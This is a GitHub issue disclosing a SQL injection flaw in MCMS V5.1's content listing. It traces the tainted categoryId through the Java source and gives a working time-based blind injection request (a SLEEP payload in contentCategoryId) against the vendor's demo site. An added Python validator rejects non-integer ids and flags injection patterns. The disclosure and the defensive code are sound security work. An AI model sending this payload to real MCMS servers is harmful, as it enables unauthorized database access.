
MCMS V5.1 /src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java has a SQL Injection Vulnerability #58

Closed
chauncyman opened this issue Dec 5, 2021 · 0 comments


chauncyman commented Dec 5, 2021

Vulnerability file:

/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java

Vulnerability tracking path:

1. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java:line 72  --The return value of call queryChildren() is tainted
2. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java:line 72  --Tainted value is returned
3. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:line 168  --The return value of call queryChildren() is tainted
4. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:line 168  --Tainted value is assigned to variable columns
5. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:line 175  --Tainted value enters call iterator() from the this argument, then taints the return value
6. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:line 175  --Tainted value is assigned to variable column~iterator
7. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:line 175  --Tainted value enters call next() from the this argument, then taints the return value
8. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:line 175  --Tainted value is assigned to variable column
9. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:line 181  --Tainted value enters call getId() from the this argument, then taints the return value
10. MCMS-master/src/main/java/net/mingsoft/cms/entity/CategoryEntity.java:line 52  --Tainted variable this.id is returned
11. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:line 181  --Tainted value enters call setCategoryId() from the 1st argument, then taints the this argument
12. MCMS-master/src/main/java/net/mingsoft/cms/entity/ContentEntity.java:line 148  --Tainted value is assigned to variable this.categoryId
13. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:line 183  --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
14. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java:line 77  --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
15. MCMS-master/src/main/java/net/mingsoft/cms/dao/IContentDao.xml:line 253  --categoryId

The SQLI-type risk is triggered, caused by the input parameter categoryId, value:
[image]

PoC:

POST /ms/cms/content/list.do HTTP/1.1
Host: cms.demo.mingsoft.net
Content-Length: 21
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://cms.demo.mingsoft.net
Referer: http://cms.demo.mingsoft.net/ms/cms/category/form.do?id=158&childId=undefined
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ****
Connection: close

contentCategoryId=158'||(SELECT 0x7155656f WHERE 5755=5755 AND (SELECT 1979 FROM (SELECT(SLEEP(5)))dYQF))||'

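The tracking path above shows categoryId travelling from the request to the SQL text in IContentDao.xml without any validation on the way. As an added defender-side example (not MCMS code; the parameter names and the integer id format are assumptions), the Python below performs the boundary check that would reject the PoC shape at the controller or a request filter and labels rejected values for alerting:

```python
import re
from urllib.parse import parse_qs

# Form parameters that end up as category ids; constructed allow-list for this example.
ID_PARAMS = {"contentCategoryId", "categoryId"}

# A category id is a canonical non-negative decimal integer (no sign, no leading zeros).
# Nothing else should ever reach queryIdsByCategoryIdForParser().
CANONICAL_ID = re.compile(r"^(0|[1-9][0-9]{0,9})$")

# Heuristic markers of the injection shape in the PoC (quote, || chaining, SELECT,
# SLEEP). Used only to label a rejected value, never as the acceptance gate.
SQLI_HINTS = re.compile(r"(?i)'|\|\||--|/\*|\bselect\b|\bunion\b|sleep\s*\(")


def validate_category_id(value: str) -> int:
    """Return the id as an int, or raise ValueError if it is not canonical."""
    if not CANONICAL_ID.match(value):
        raise ValueError(f"category id is not a canonical integer: {value!r}")
    return int(value)


def inspect_form_body(body: str) -> list:
    """Parse an application/x-www-form-urlencoded body and report every id
    parameter that fails validation as (param, value, reason)."""
    findings = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if name not in ID_PARAMS:
            continue
        for value in values:
            try:
                validate_category_id(value)
            except ValueError:
                reason = "sqli-pattern" if SQLI_HINTS.search(value) else "non-numeric"
                findings.append((name, value, reason))
    return findings


if __name__ == "__main__":
    # Constructed sample bodies: a benign request, the PoC shape, and a plain typo.
    for body in (
        "contentCategoryId=158",
        "contentCategoryId=158'||(SELECT 1 FROM (SELECT(SLEEP(5)))x)||'",
        "contentCategoryId=15a&pageNo=1",
    ):
        print(body[:40].ljust(42), inspect_form_body(body))
```

The allow-list gate is what stops the injection; the hint regex only decides whether a rejected request is worth an alert rather than a 400.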

@chauncyman chauncyman changed the title MCMS V5.1 /src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java hava a SQL Injection Vulnerability MCMS V5.1 /src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java hava a SQL Injection Vulnerability Dec 6, 2021
@killfen killfen closed this as completed Sep 9, 2022